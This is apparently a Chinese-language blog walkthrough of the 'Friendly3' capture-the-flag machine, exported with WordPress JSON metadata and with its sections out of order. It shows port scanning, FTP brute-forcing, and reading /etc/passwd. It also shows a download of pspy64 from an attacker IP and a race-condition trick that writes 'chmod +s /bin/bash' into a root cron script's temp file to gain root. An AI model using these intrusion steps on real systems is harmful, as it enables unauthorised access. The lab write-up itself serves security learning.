1 root root 9 Jun 25 2023 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Jun 25 2023 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Jun 25 2023 lost+found\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 media\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 mnt\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 opt\ndr-xr-xr-x 140 root root 0 Apr 14 05:33 proc\ndrwx------ 4 root root 4096 Jul 17 2023 root\ndrwxr-xr-x 17 root root 540 Apr 14 06:04 run\nlrwxrwxrwx 1 root root 8 Jun 25 2023 sbin -> usr\/sbin\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 srv\ndr-xr-xr-x 13 root root 0 Apr 14 05:33 sys\ndrwxrwxrwt 7 root root 4096 Apr 14 06:09 tmp\ndrwxr-xr-x 14 root root 4096 Jun 25 2023 usr\ndrwxr-xr-x 12 root root 4096 Jun 25 2023 var\nlrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz -> boot\/vmlinuz-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz.old -> boot\/vmlinuz-6.1.0-9-amd64\njuan@friendly3:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\njuan@friendly3:\/$ cd opt\njuan@friendly3:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\n-rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh\njuan@friendly3:\/opt$ cat check_for_install.sh \n#!\/bin\/bash\n\n\/usr\/bin\/curl "http:\/\/127.0.0.1\/9842734723948024.bash" > \/tmp\/a.bash\n\nchmod +x \/tmp\/a.bash\nchmod +r \/tmp\/a.bash\nchmod +w \/tmp\/a.bash\n\n\/bin\/bash \/tmp\/a.bash\n\nrm -rf \/tmp\/a.bash\njuan@friendly3:\/opt$ cd \/tmp\njuan@friendly3:\/tmp$ wget http:\/\/172.20.10.8:8888\/pspy64\n-bash: wget: command not found\njuan@friendly3:\/tmp$ busybox wget http:\/\/172.20.10.8:8888\/pspy64\nConnecting to 172.20.10.8:8888 (172.20.10.8:8888)\nsaving to 'pspy64'\npspy64 100% |***********************************************************************| 4364k 0:00:00 ETA\n'pspy64' saved\njuan@friendly3:\/tmp$ chmod +x pspy64\njuan@friendly3:\/tmp$ .\/pspy64<\/code><\/pre>\n\u770b\u5230\u4e86\u4e00\u4e2a\u7591\u4f3c\u53ef\u4ee5\u5229\u7528\u7684\u811a\u672c\uff0c\u4f20\u4e00\u4e2apspy64\u4e0a\u53bb\uff0c\u770b\u770b\u662f\u5426\u662f\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n
<\/div><\/p>\n\u786e\u5b9e\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u5c1d\u8bd5\u89c1\u7f1d\u63d2\u9488\u5199\u4e2a\u811a\u672c\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/sh\nwhile true:\ndo\necho "chmod + s \/bin\/bash" >> a.bash\ndone<\/code><\/pre>\njuan@friendly3:\/tmp$ .\/exp.sh \n.\/exp.sh: line 1: 1:: command not found<\/code><\/pre>\nwhat?\u76f4\u63a5\u6267\u884c\u5427\u3002\u3002\u3002\u3002\u3002<\/p>\n
while true;do echo 'chmod +s \/bin\/bash' >> a.bash;done<\/code><\/pre>\n\u62ff\u5230shell\uff01\uff01<\/p>\n
juan@friendly3:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23 2023 \/bin\/bash\njuan@friendly3:\/tmp$ while true;do echo 'chmod +s \/bin\/bash' >> a.bash;done\n^Cchmod +s \/bin\/bash\njuan@friendly3:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23 2023 \/bin\/bash\njuan@friendly3:\/tmp$ bash -p\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 40\ndrwx------ 4 root root 4096 Jul 17 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n-r-xr-xr-x 1 root root 509 Jun 25 2023 interfaces.sh\n-rw------- 1 root root 20 Jun 25 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-r-------- 1 root root 33 Jul 17 2023 root.txt\n-rw-r--r-- 1 root root 66 Jun 25 2023 .selected_editor\ndrwx------ 2 root root 4096 Jun 25 2023 .ssh\nbash-5.2# cat root.txt \neb9748b67f25e6bd202e5fa25f534d51<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Friendly3 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.5 — -A Open […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-556","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=556"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556\/revisions"}],"predecessor-version":[{"id":557,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/556\/revisions\/557"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=556"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
rustscan -a 172.20.10.5 -- -A<\/code><\/pre>\nOpen 172.20.10.5:21\nOpen 172.20.10.5:22\nOpen 172.20.10.5:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G\/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=\n| 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.22.1\n| http-methods: \n|_ Supported Methods: GET HEAD\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\u6ca1\u6709\u626b\u5230\u4e1c\u897f\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nHi, sysadmin\nI want you to know that I've just uploaded the new files into the FTP Server.\nSee you,\njuan.<\/code><\/pre>\n\u7206\u7834FTP<\/h3>\n
\u67e5\u770b\u4e00\u4e0bFTP\uff0c\u5c1d\u8bd5\u533f\u540d\u767b\u5f55\uff0c\u6211\u5c1d\u8bd5\u4e86\u4e00\u4e0b\u540d\u5b57\uff1a<\/p>\n
admin\nroot\nftp\nanonymous\njuan\nsysadmin\njuan.<\/code><\/pre>\n\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u7206\u7834juan\u548csysadmin<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u5f97\u5230\u7528\u6237<\/p>\n
juan\nalexis<\/code><\/pre>\n\u67e5\u770b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ ftp 172.20.10.5 \nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): juan\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||51316|)\n150 Here comes the directory listing.\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 .\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 ..\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file1\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file10\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file100\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file11\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file12\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file13\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file14\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file15\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file16\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file17\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file18\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file19\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file2\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file20\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file21\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file22\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file23\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file24\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file25\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file26\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file27\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file28\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file29\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file3\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file30\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file31\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file32\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file33\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file34\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file35\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file36\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file37\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file38\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file39\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file4\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file40\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file41\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file42\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file43\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file44\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file45\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file46\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file47\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file48\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file49\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file5\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file50\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file51\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file52\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file53\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file54\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file55\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file56\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file57\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file58\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file59\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file6\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file60\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file61\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file62\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file63\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file64\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file65\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file66\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file67\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file68\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file69\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file7\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file70\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file71\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file72\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file73\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file74\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file75\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file76\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file77\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file78\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file79\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file8\n-rw-r--r-- 1 0 0 36 Jun 25 2023 file80\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file81\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file82\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file83\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file84\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file85\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file86\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file87\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file88\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file89\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file9\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file90\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file91\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file92\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file93\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file94\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file95\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file96\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file97\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file98\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file99\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9\n-rw-r--r-- 1 0 0 58 Jun 25 2023 fole32\n226 Directory send OK.\nftp> get file80\nlocal: file80 remote: file80\n229 Entering Extended Passive Mode (|||21632|)\n150 Opening BINARY mode data connection for file80 (36 bytes).\n100% |***********************************************************************************************************| 36 0.39 KiB\/s 00:00 ETA\n226 Transfer complete.\n36 bytes received in 00:00 (0.38 KiB\/s)\nftp> get fole32\nlocal: fole32 remote: fole32\n229 Entering Extended Passive Mode (|||14269|)\n150 Opening BINARY mode data connection for fole32 (58 bytes).\n100% |***********************************************************************************************************| 58 92.09 KiB\/s 00:00 ETA\n226 Transfer complete.\n58 bytes received in 00:00 (55.15 KiB\/s)\nftp> get fold10\nlocal: fold10 remote: fold10\n229 Entering Extended Passive Mode (|||46237|)\n550 Failed to open file.\nftp> cd fold10\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38694|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 .\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 ..\n-rw-r--r-- 1 0 0 163 Jun 25 2023 .test.txt\n226 Directory send OK.\nftp> get .test.txt\nlocal: .test.txt remote: .test.txt\n229 Entering Extended Passive Mode (|||45645|)\n150 Opening BINARY mode data connection for .test.txt (163 bytes).\n100% |***********************************************************************************************************| 163 1.78 KiB\/s 00:00 ETA\n226 Transfer complete.\n163 bytes received in 00:00 (1.77 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat file80 \nHi, I'm the sysadmin. I am bored...\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat fole32 \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat .test.txt \nHi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...<\/code><\/pre>\n\u4ec0\u4e48\u73a9\u610f\uff1f\u6682\u65f6\u6ca1\u5565\u7528\u4e86\uff0c\u770b\u6765\u662f\uff0c\u5c1d\u8bd5ssh\u7206\u7834\uff0c\u987a\u4fbf\u8bd5\u4e00\u4e0b\u662f\u5426\u662f\u76f8\u540c\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u4e0d\u7528\u7206\u7834\u4e86\uff0c\u4f46\u662f\u8fd8\u662f\u8ba9\u4ed6\u5728\u540e\u9762\u8dd1\u5427\uff0c\u7b49\u4e0b\uff0c\u51fa\u6765\u8fa3\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\njuan@friendly3:~$ ls -la\ntotal 28\ndrwxr-xr-x 3 juan juan 4096 Jul 17 2023 .\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout\n-rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc\ndrwxr-xr-x 14 root root 4096 Jun 25 2023 ftp\n-rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile\n-r-------- 1 juan juan 33 Jul 17 2023 user.txt\njuan@friendly3:~$ cat user.txt \ncb40b159c8086733d57280de3f97de30\njuan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>\/dev\/null\njuan@friendly3:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nftp:x:100:108:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\njuan:x:1001:1001::\/home\/juan:\/bin\/bash\nmessagebus:x:101:109::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nblue:x:1002:1002::\/home\/blue:\/bin\/bash\njuan@friendly3:~$ cd ..\njuan@friendly3:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\ndrwxr-xr-x 2 blue blue 4096 Jun 25 2023 blue\ndrwxr-xr-x 3 juan juan 4096 Jul 17 2023 juan\njuan@friendly3:\/home$ cd blue\njuan@friendly3:\/home\/blue$ ls -la\ntotal 20\ndrwxr-xr-x 2 blue blue 4096 Jun 25 2023 .\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 blue blue 220 Apr 23 2023 .bash_logout\n-rw-r--r-- 1 blue blue 3526 Apr 23 2023 .bashrc\n-rw-r--r-- 1 blue blue 807 Apr 23 2023 .profile\njuan@friendly3:\/home\/blue$ find \/ -name zlcnffjbeq.gkg 2>\/dev\/null\njuan@friendly3:\/home\/blue$ find \/ -user blue -name *.txt 2>\/dev\/null\njuan@friendly3:\/home\/blue$ find \/ -user juan -name *.txt 2>\/dev\/null\n\/home\/juan\/user.txt\njuan@friendly3:\/home\/blue$ find \/ -user root -name *.txt 2>\/dev\/null\n\/home\/juan\/ftp\/fold8\/passwd.txt\n\/home\/juan\/ftp\/fold10\/.test.txt\n\/home\/juan\/ftp\/fold5\/yt.txt\n\/var\/cache\/dictionaries-common\/ispell-dicts-list.txt\n\/usr\/share\/vim\/vim90\/doc\/help.txt\n\/usr\/share\/doc\/publicsuffix\/examples\/test_psl.txt\n\/usr\/share\/doc\/openssl\/fingerprints.txt\n\/usr\/share\/doc\/openssl\/HOWTO\/keys.txt\n\/usr\/share\/doc\/vsftpd\/examples\/VIRTUAL_USERS\/logins.txt\n\/usr\/share\/doc\/libdb5.3\/build_signature_amd64.txt\n\/usr\/share\/doc\/mount\/mount.txt\n\/usr\/share\/doc\/util-linux\/howto-debug.txt\n\/usr\/share\/doc\/util-linux\/release-schedule.txt\n\/usr\/share\/doc\/util-linux\/howto-man-page.txt\n\/usr\/share\/doc\/util-linux\/col.txt\n\/usr\/share\/doc\/util-linux\/pg.txt\n\/usr\/share\/doc\/util-linux\/howto-tests.txt\n\/usr\/share\/doc\/util-linux\/getopt.txt\n\/usr\/share\/doc\/util-linux\/getopt_changelog.txt\n\/usr\/share\/doc\/util-linux\/cal.txt\n\/usr\/share\/doc\/util-linux\/hwclock.txt\n\/usr\/share\/doc\/util-linux\/howto-build-sys.txt\n\/usr\/share\/doc\/util-linux\/PAM-configuration.txt\n\/usr\/share\/doc\/util-linux\/howto-compilation.txt\n\/usr\/share\/doc\/util-linux\/mount.txt\n\/usr\/share\/doc\/util-linux\/deprecated.txt\n\/usr\/share\/doc\/util-linux\/modems-with-agetty.txt\n\/usr\/share\/doc\/util-linux\/blkid.txt\n\/usr\/share\/doc\/util-linux\/00-about-docs.txt\n\/usr\/share\/doc\/busybox\/syslog.conf.txt\njuan@friendly3:\/home\/blue$ cat \/home\/juan\/ftp\/fold8\/passwd.txt\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u281f\u281b\u281b\u281b\u280b\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2819\u281b\u281b\u281b\u283f\u283b\u283f\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\u2800\u2800\u2800\u2800\u2840\u2820\u2824\u2812\u2882\u28c9\u28c9\u28c9\u28d1\u28d2\u28d2\u2812\u2812\u2812\u2812\u2812\u2812\u2812\u2800\u2800\u2810\u2812\u281a\u283b\u283f\u283f\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280f\u2800\u2800\u2800\u2800\u2860\u2814\u2809\u28c0\u2814\u2812\u2809\u28c0\u28c0\u2800\u2800\u2800\u28c0\u2840\u2808\u2809\u2811\u2812\u2812\u2812\u2812\u2812\u2808\u2809\u2809\u2809\u2801\u2802\u2800\u2808\u2819\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u2814\u2801\u2820\u2816\u2821\u2814\u280a\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2810\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2844\u2800\u2800\u2800\u2800\u2809\u2832\u2884\u2800\u2800\u2800\u2808\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u280a\u2800\u2880\u28c0\u28e4\u28e4\u28e4\u28e4\u28c0\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u2800\u281c\u2800\u2800\u2800\u2800\u28c0\u2840\u2800\u2808\u2803\u2800\u2800\u2800\u2838\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u287f\u2825\u2810\u2802\u2800\u2800\u2800\u2800\u2844\u2800\u2830\u28ba\u28ff\u28ff\u28ff\u28ff\u28ff\u28df\u2800\u2808\u2810\u28a4\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u28f6\u28fe\u28ef\u2800\u2800\u2809\u2802\u2800\u2820\u2824\u2884\u28c0\u2819\u28bf\u28ff\u28ff\n\u28ff\u287f\u280b\u2821\u2810\u2808\u28c9\u282d\u2824\u2824\u2884\u2840\u2808\u2800\u2808\u2801\u2809\u2801\u2860\u2800\u2800\u2800\u2809\u2810\u2820\u2814\u2800\u2800\u2800\u2800\u2800\u2832\u28ff\u283f\u281b\u281b\u2813\u2812\u2802\u2800\u2800\u2800\u2800\u2800\u2800\u2820\u2849\u28a2\u2819\u28ff\n\u28ff\u2800\u2880\u2801\u2800\u280a\u2800\u2800\u2800\u2800\u2800\u2808\u2801\u2812\u2802\u2800\u2812\u280a\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\